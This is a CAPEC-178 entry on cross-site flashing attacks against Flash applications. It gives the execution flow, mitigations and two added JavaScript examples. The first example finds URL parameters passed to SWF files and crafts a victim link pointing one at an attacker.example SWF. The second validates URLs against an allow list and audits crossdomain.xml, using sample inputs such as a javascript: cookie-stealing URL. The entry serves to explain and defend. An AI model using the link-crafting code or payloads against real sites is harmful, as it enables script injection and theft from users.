CAPEC-178 Metadata
Likelihood of Attack
Medium
Typical Severity
Medium
Overview
Summary
An attacker tricks the victim into loading a Flash document (SWF) that passes commands or calls to the Flash Player browser plugin, letting the attacker use native Flash functionality in the client browser. The pattern applies wherever the attacker can hand the victim a crafted link to a Flash document which, when followed, causes additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document itself. The attack relies on the fact that Flash files can reference external URLs: if the variables that hold the URLs a Flash application loads can be set through parameters (the SWF's query string or the embedding page's flashvars), then a link that supplies values for those parameters makes the targeted application reference, and possibly execute, content of the attacker's choosing.
Prerequisites
The targeted Flash application must reference external URLs, and the locations it references must be controllable through parameters. The Flash application must fail to validate those parameters against malicious manipulation. The victim must follow a crafted link created by the attacker.
Execution Flow
Step | Phase | Description | Techniques |
---|---|---|---|
1 | Explore | [Identification] Using a browser or an automated tool, the attacker records every URL (or partial URL, such as a bare domain) that is passed to a Flash file (SWF) as a parameter. | |
2 | Experiment | [Attempt to inject a remote Flash file] The attacker points such a parameter at a remotely hosted SWF that produces a uniquely identifiable output when it executes inside the targeted Flash application, which confirms that the parameter controls what gets loaded. | |
3 | Exploit | [Access or modify Flash application variables] Once the injection succeeds, the attacker's content runs inside the targeted Flash application and can read or change its variables (stored values, passwords and the like). | |
4 | Exploit | [Execute JavaScript in the victim's browser] Because the injected content runs in the targeted application's context, the attacker can also have it inject JavaScript into the page's DOM, turning the flaw into a cross-site scripting attack. | |
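The following is an added example, not part of the CAPEC entry, that carries out step 1 (identification) and step 2 (building the injection link) of the execution flow above. It scans a page for SWF embeds, lists the parameters whose values are URLs, and then builds the crafted link that points one of them at an attacker-hosted SWF. The sample page, its hosts and its parameter names are constructed for the example. Flash Player hands both the SWF URL's query string and the embedding page's flashvars to the movie as top-level variables, so a parameter that the page only sets through flashvars is normally also settable from a direct link to the SWF.

```javascript
// Added example (not from CAPEC): recon for CAPEC-178 steps 1 and 2.
// Constructed sample page; hosts and parameter names are assumptions.
const SAMPLE_HTML = `
<object data="/player/video.swf?movie=http://cdn.example.com/intro.swf&amp;skin=dark"
        type="application/x-shockwave-flash">
  <param name="flashvars" value="config=http://cdn.example.com/player.xml&autoplay=1">
</object>
<embed src="/widgets/chart.swf" flashvars="dataUrl=https://api.example.com/data.xml&title=Sales">
<embed src="/widgets/about.swf" flashvars="lang=en&theme=blue">
`;

// A value is a URL candidate if it carries a scheme, starts with // or is a
// bare host name; loadMovie/getURL-style calls follow all three.
function looksLikeUrl(value) {
  return /^[a-z][a-z0-9+.-]*:/i.test(value)
    || value.startsWith('//')
    || /^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}(\/|$)/i.test(value);
}

function splitUrl(url) {
  const i = url.indexOf('?');
  return i < 0 ? [url, ''] : [url.slice(0, i), url.slice(i + 1)];
}

function parseParams(query) {
  return query.split('&').filter(Boolean).map(pair => {
    const i = pair.indexOf('=');
    const k = i < 0 ? pair : pair.slice(0, i);
    const v = i < 0 ? '' : pair.slice(i + 1);
    return [decodeURIComponent(k), decodeURIComponent(v)];
  });
}

// Read one double-quoted attribute out of a tag's attribute string.
function attr(tag, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*"([^"]*)"`, 'i').exec(tag);
  return m ? m[1] : '';
}

// Step 1: every URL-carrying parameter reaching a SWF on the page.
// source is "query" (the SWF URL's query string) or "flashvars".
function findSwfUrlParams(html) {
  const decoded = html.replace(/&amp;/g, '&');
  const findings = [];
  const record = (swf, source, query) => {
    for (const [param, value] of parseParams(query)) {
      if (looksLikeUrl(value)) findings.push({ swf, source, param, value });
    }
  };
  for (const m of decoded.matchAll(/<object\b([^>]*)>([\s\S]*?)<\/object>/gi)) {
    const [swf, query] = splitUrl(attr(m[1], 'data'));
    record(swf, 'query', query);
    const fv = /<param\b[^>]*name\s*=\s*"flashvars"[^>]*value\s*=\s*"([^"]*)"/i.exec(m[2]);
    if (fv) record(swf, 'flashvars', fv[1]);
  }
  for (const m of decoded.matchAll(/<embed\b([^>]*)>/gi)) {
    const [swf, query] = splitUrl(attr(m[1], 'src'));
    record(swf, 'query', query);
    record(swf, 'flashvars', attr(m[1], 'flashvars'));
  }
  return findings;
}

// Step 2: a direct link to the SWF on the victim's origin that sets the
// discovered parameter to an attacker-hosted SWF (or any other URL).
function craftLink(victimOrigin, finding, attackerUrl) {
  return `${victimOrigin}${finding.swf}?${encodeURIComponent(finding.param)}=${encodeURIComponent(attackerUrl)}`;
}

const found = findSwfUrlParams(SAMPLE_HTML);
for (const f of found) console.log(`${f.swf} [${f.source}] ${f.param} = ${f.value}`);
console.log(craftLink('https://victim.example', found[0], 'http://attacker.example/probe.swf'));
```

On the sample page this reports three candidates (movie and config on video.swf, dataUrl on chart.swf) and prints the link an attacker would send for the first one; a probe SWF that writes a recognisable marker when it runs is what turns that link into the confirmation described in step 2.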
Potential Solutions / Mitigations
Implementation: Only allow known URLs to be included as remote Flash movies in a Flash application; validate every URL-carrying parameter against that allow list before it is used in a load or navigation call.
Configuration: Properly configure the crossdomain.xml file so that it lists only the known domains that should host remote Flash movies, with no wildcard entries.
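An added example, not from the CAPEC entry or any Flash product, of the two mitigations above. The first part shows the unchecked handling a vulnerable movie performs (the parameter goes straight into the load call) beside a checked resolver that enforces a fixed host allow list; it is written in JavaScript rather than ActionScript so it can be run, but the checks are the same ones the SWF or the server that emits its parameters should perform. The second part audits a crossdomain.xml policy for the wildcard and secure="false" settings the Configuration mitigation warns against. The site origin, allowed hosts and both policy files are assumptions constructed for the example.

```javascript
// Added example (not from CAPEC): allow-list validation for URL parameters
// and a crossdomain.xml audit. Origin, hosts and policies are assumptions.
const SITE_ORIGIN = 'https://www.example.com';
const SITE_HOST = new URL(SITE_ORIGIN).hostname;
const ALLOWED_MOVIE_HOSTS = new Set(['cdn.example.com', 'media.example.com']);
const FALLBACK_MOVIE = SITE_ORIGIN + '/player/default.swf';

// Vulnerable behaviour: the parameter is used as given, which is what a movie
// does when it calls loadMovie(_root.movie) or getURL(_root.link) unchecked.
function resolveMovieUnchecked(param) {
  return param;
}

// Hardened: resolve against the site, require http(s), require an exact
// allow-listed host and a .swf path, and fall back to a fixed movie otherwise.
function resolveMovieChecked(param) {
  let url;
  try {
    url = new URL(param, SITE_ORIGIN);        // relative paths stay on the site
  } catch {
    return FALLBACK_MOVIE;                    // unparsable input
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return FALLBACK_MOVIE; // javascript:, data:, file:
  if (url.username || url.password) return FALLBACK_MOVIE;   // http://cdn.example.com@evil/
  if (url.hostname !== SITE_HOST && !ALLOWED_MOVIE_HOSTS.has(url.hostname)) return FALLBACK_MOVIE; // exact match, no suffix tricks
  if (!url.pathname.toLowerCase().endsWith('.swf')) return FALLBACK_MOVIE;
  return url.href;
}

// Constructed policies: the weak one is what an attacker hopes to find.
const WEAK_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>`;

const STRONG_POLICY = `<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="cdn.example.com" secure="true" />
  <allow-access-from domain="media.example.com" secure="true" />
</cross-domain-policy>`;

// Returns a list of problems; an empty list means every entry names a fixed
// host and keeps the default secure="true" (https-served policy, https-only use).
function auditCrossDomainPolicy(xml) {
  const problems = [];
  for (const m of xml.matchAll(/<allow-access-from\b([^>]*)>/gi)) {
    const attrs = m[1];
    const domain = (/\bdomain\s*=\s*"([^"]*)"/i.exec(attrs) || [, ''])[1];
    const secure = (/\bsecure\s*=\s*"([^"]*)"/i.exec(attrs) || [, 'true'])[1];
    if (domain === '*') problems.push('domain="*" lets SWFs from any site load this server\'s content');
    else if (domain.startsWith('*.')) problems.push(`domain="${domain}" is a wildcard, broader than a fixed host list`);
    if (secure.toLowerCase() === 'false') problems.push(`secure="false" for "${domain}" lets http:// SWFs use this https:// policy`);
  }
  return problems;
}

for (const p of ['http://cdn.example.com/intro.swf', '/movies/intro.swf',
                 'http://attacker.example/evil.swf', 'javascript:alert(document.cookie)',
                 '//attacker.example/evil.swf', 'http://cdn.example.com.attacker.example/evil.swf']) {
  console.log(`${p}\n  unchecked -> ${resolveMovieUnchecked(p)}\n  checked   -> ${resolveMovieChecked(p)}`);
}
console.log('weak policy:', auditCrossDomainPolicy(WEAK_POLICY));
console.log('strong policy:', auditCrossDomainPolicy(STRONG_POLICY));
```

The checked resolver compares the parsed hostname for equality rather than testing whether the string starts with or contains an allowed name, which is what defeats the cdn.example.com.attacker.example and user-info forms; the fallback is a fixed movie on the site rather than an error so the player still works when a parameter is rejected.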
Related Weaknesses (CWE)
CWE ID | Description |
---|---|
CWE-601 | URL Redirection to Untrusted Site ('Open Redirect') |
Related CAPECs
CAPEC ID | Description |
---|---|
CAPEC-182 | An attacker tricks a victim into executing malicious Flash content that executes commands or makes Flash calls specified by the attacker. One example is cross-site flashing, in which an attacker-controlled parameter to a reference call causes content specified by the attacker to be loaded. |